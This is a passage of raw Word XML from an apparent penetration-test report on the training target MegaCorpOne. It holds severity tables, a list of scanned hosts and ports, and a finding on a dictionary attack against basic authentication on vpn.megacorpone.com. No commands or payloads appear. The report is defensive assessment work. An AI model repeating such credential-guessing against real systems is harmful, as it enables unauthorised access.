            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="008000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7409" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Network Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="9900FF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7409" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="9900FF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7409" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Post Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="9900FF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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The following summary tables represent an overview of the assessment findings for this penetration test:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="6826" w:type="dxa"/>
        <w:tblInd w:w="125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13"/>
        <w:gridCol w:w="3413"/>
      </w:tblGrid>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3413" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Scan Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3413" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="532"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3413" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3413" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>What hosts did you scan?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.20 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>172.22.117.100</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.150 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>192.241.255.118</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="532"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3413" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3413" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>What ports did you scan?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>21 22 80 106 110 443</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="6840" w:type="dxa"/>
        <w:tblInd w:w="125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20"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Exploitation Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FF9900"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FF9900"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF9900"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FF9900"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FF9900"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:b/>
                <w:color w:val="008000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_7awkona5fyh7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_1ci93xb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Weak Password on Public Web Application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Risk Rating</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Critical</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Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The site </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vpn.megacorpone.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to host the Cisco AnyConnect configuration file for MegaCorpOne. This site is secured with basic authentication but is susceptible to a dictionary attack. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>KCT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> was able to use a username gathered from OSINT in combination with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>wordlist in order to guess the user’s password and access the configuration file.</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b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Affected Hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: vpn.megacorpone.com</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Remediation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
